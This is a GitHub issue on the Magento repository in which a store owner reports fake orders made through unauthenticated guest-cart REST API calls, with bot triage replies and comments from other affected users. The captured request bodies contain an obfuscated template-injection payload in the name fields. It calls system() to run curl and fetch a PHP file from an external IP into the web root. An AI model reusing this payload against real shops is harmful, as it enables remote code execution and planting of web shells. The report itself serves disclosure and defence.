Open pratikkamani opened 1 month ago
Hi @pratikkamani. Thank you for your report. To speed up processing of this issue, make sure that the issue is reproducible on the vanilla Magento instance following Steps to reproduce. To deploy vanilla Magento instance on our environment, Add a comment to the issue:
@magento give me 2.4-develop instance
- upcoming 2.4.x release@magento I am working on this
Join Magento Community Engineering Slack and ask your questions in #github channel. :warning: According to the Magento Contribution requirements, all issues must go through the Community Contributions Triage process. Community Contributions Triage is a public meeting. :clock10: You can find the schedule on the Magento Community Calendar page. :telephone_receiver: The triage of issues happens in the queue order. If you want to speed up the delivery of your contribution, join the Community Contributions Triage session to discuss the appropriate ticket.
Hi @engcom-Bravo. Thank you for working on this issue. In order to make sure that issue has enough information and ready for development, please read and check the following instruction: :point_down:
Area: XXXXX
label to the ticket, indicating the functional areas it may be related to.2.4-develop
branch@magento give me 2.4-develop instance
to deploy test instance on Magento infrastructure. 2.4-develop
branch, please, add the label Reproduced on 2.4.x
.Issue: Confirmed
once verification is complete. I have similar issue with a Magento 2 website on version 2.3.5-p7 and lots of orders that are generated with the same format of code.
Affecting us as well, on Magento 2.4.6 We have installed the security patch recommended CVE-2024-34102 but it still allows orders and customer account creation through the API unsecured.
Patching is mandatory, but the solution below (creating custom module) is how I complete stopping execution of orders like these:
https://github.com/magento/magento2/issues/39002#issuecomment-2291143582
Patching is mandatory, but the solution below (creating custom module) is how I complete stopping execution of orders like these:
Thanks, I really appreciate this. I will try it.
@magento give me 2.4-develop instance
Hi @engcom-Bravo. Thank you for your request. I'm working on Magento instance for you.
Hi @engcom-Bravo, unfortunately there is no ability to deploy Magento instance at the moment. Please try again later.
Preconditions and environment
Steps to reproduce
Call the API
Site_URL/rest/default/V1/guest-carts
with unprotected POST REST API. Route (POST):/rest/default/V1/guest-carts
ResponseMagento\Quote\Api\GuestCartManagementInterface::createEmptyCart(): DZ6S7TOtfMyuADCUTGdaues3ZsraiapD
Route (POST):
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/items
Request:{"cartItem":{"sku":"A600-AL","qty":1,"quote_id":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD"},"cartId":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD"}
ResponseMagento\Quote\Api\GuestCartItemRepositoryInterface::save(): {"item_id":160271,"sku":"A600-AL","qty":1,"name":"A600-AL","price":19.12,"product_type":"simple","quote_id":"129891"}
Route (POST):
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/estimate-shipping-methods
Request:{"address":{"region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}","email":"johnsmith9172@outlook.com","telephone":"512 555 1991"},"cartId":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD"}
Response
Magento\Quote\Api\GuestShipmentEstimationInterface::estimateByExtendedAddress(): [{"carrier_code":"ups","method_code":"03","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Ground","amount":11.19,"base_amount":11.19,"available":true,"error_message":"","price_excl_tax":11.19,"price_incl_tax":11.19},{"carrier_code":"ups","method_code":"12","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Three-Day Select","amount":26.41,"base_amount":26.41,"available":true,"error_message":"","price_excl_tax":26.41,"price_incl_tax":26.41},{"carrier_code":"ups","method_code":"02","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Second Day Air","amount":28.79,"base_amount":28.79,"available":true,"error_message":"","price_excl_tax":28.79,"price_incl_tax":28.79},{"carrier_code":"ups","method_code":"01","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Next Day Air","amount":50.28,"base_amount":50.28,"available":true,"error_message":"","price_excl_tax":50.28,"price_incl_tax":50.28},{"carrier_code":"ups","method_code":"14","carrier_title":"United Parcel Service (Select UPS for 10% off Shipping)","method_title":"UPS Next Day Air Early A.M.","amount":160.18,"base_amount":160.18,"available":true,"error_message":"","price_excl_tax":160.18,"price_incl_tax":160.18},{"carrier_code":"usps","method_code":"1","carrier_title":"United States Postal Service","method_title":"Priority Mail","amount":18.05,"base_amount":18.05,"available":true,"error_message":"","price_excl_tax":18.05,"price_incl_tax":18.05},{"carrier_code":"usps","method_code":"17","carrier_title":"United States Postal Service","method_title":"Priority Mail Medium Flat Rate Box","amount":18.4,"base_amount":18.4,"available":true,"error_message":"","price_excl_tax":18.4,"price_incl_tax":18.4},{"carrier_code":"usps","method_code":"22","carrier_title":"United States Postal Service","method_title":"Priority Mail Large Flat Rate Box","amount":24.75,"base_amount":24.75,"available":true,"error_message":"","price_excl_tax":24.75,"price_incl_tax":24.75}]
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/shipping-information
Request:{"addressInformation":{"shipping_address":{"region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}","email":"johnsmith9172@outlook.com","telephone":"512 555 1991"},"billing_address":{"region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}","email":"johnsmith9172@outlook.com","telephone":"512 555 1991"},"shipping_method_code":"03","shipping_carrier_code":"ups"},"cartId":"pVLLOZul1hdTK5aeirQ9B6kQYXfXhtrF"}
Response Magento\Checkout\Api\GuestShippingInformationManagementInterface::saveAddressInformation():
{"payment_methods":[{"code":"paypal_express","title":"PayPal Website Payments Standard"},{"code":"authnetcim","title":"Credit Card (Authorize.Net CIM)"}],"totals":{"grand_total":30.31,"base_grand_total":30.31,"subtotal":19.12,"base_subtotal":19.12,"discount_amount":0,"base_discount_amount":0,"subtotal_with_discount":19.12,"base_subtotal_with_discount":19.12,"shipping_amount":11.19,"base_shipping_amount":11.19,"shipping_discount_amount":0,"base_shipping_discount_amount":0,"tax_amount":0,"base_tax_amount":0,"weee_tax_applied_amount":null,"shipping_tax_amount":0,"base_shipping_tax_amount":0,"subtotal_incl_tax":19.12,"shipping_incl_tax":11.19,"base_shipping_incl_tax":11.19,"base_currency_code":"USD","quote_currency_code":"USD","items_qty":1,"items":[{"item_id":160271,"price":19.12,"base_price":19.12,"qty":1,"row_total":19.12,"base_row_total":19.12,"row_total_with_discount":0,"tax_amount":0,"base_tax_amount":0,"tax_percent":0,"discount_amount":0,"base_discount_amount":0,"discount_percent":0,"price_incl_tax":19.12,"base_price_incl_tax":19.12,"row_total_incl_tax":19.12,"base_row_total_incl_tax":19.12,"options":"[]","weee_tax_applied_amount":null,"weee_tax_applied":null,"name":"A600-AL"}],"total_segments":[{"code":"subtotal","title":"Subtotal","value":19.12},{"code":"shipping","title":"Shipping & Handling (United Parcel Service (Select UPS for 10% off Shipping) - UPS Ground)","value":11.19},{"code":"tax","title":"Tax","value":0,"area":"taxes","extension_attributes":{"tax_grandtotal_details":[]}},{"code":"grand_total","title":"Grand Total","value":30.31,"area":"footer"}]}}
/rest/default/V1/guest-carts/DZ6S7TOtfMyuADCUTGdaues3ZsraiapD/payment-information
Request:{"cartId":"DZ6S7TOtfMyuADCUTGdaues3ZsraiapD","email":"johnsmith9172@outlook.com","paymentMethod":{"method":"authnetcim","extension_attributes":{"agreement_ids":["1","2","3","4","5","6","7","8","9","10","11","12","13","14","15","16","17","18","19","20","21","22","23","24","25","26","27","28","29","30","31","32","33","34","35","36","37","38","39","40","41","42","43","44","45","46","47","48","49","50"]}},"billing_address":{"email":"johnsmith9172@outlook.com","region":"New York","region_id":43,"region_code":"NY","country_id":"US","street":["123 Oak Ave"],"postcode":"10577","city":"New York","telephone":"512 555 1991","firstname":"{{var this.getTemp\tlateFil\tter().filter(firstname)}}","lastname":"{{var this.getTemp\tlateFil\tter().add\tAfterFil\tterCallb\tack(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}health_check.php${IFS%??}http:\/\/185.157.161.162\/cache.php?m=8216-29079-10075)}}"}}
With the above shipping information and payment information in various combinations, they call Thousand API and try to place an order. They inject the code when place an order successfully.
They also try
API.INFO -
Request-Headers: Cookie: PHPSESSID=90d3af9b57b19a50856c5b0d37feef2d; discount_custom=-0 X-Https: 1 Content-Type: application/json; charset=utf-8 User-Agent: Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.87 Mobile Safari/537.36 Content-Length: 490 X-Sucuri-Country: US X-Sucuri-Clientip: 154.30.211.206 X-Real-Ip: 154.30.211.206 X-Forwarded-Proto: https X-Forwarded-For: 154.30.211.206 Host: p*********s.com
The IP of the hacker is abused. https://www.abuseipdb.com/check/154.30.211.206,
Expected result
the spammer is not able to create an order successfully, you should block them to make fack order with native Magento API. This is a misuse of native Magento API. Should Magento protect this API with a token?
Actual result
fack order created with native Magento API.
Additional information
No response
Release note
No response
Triage and priority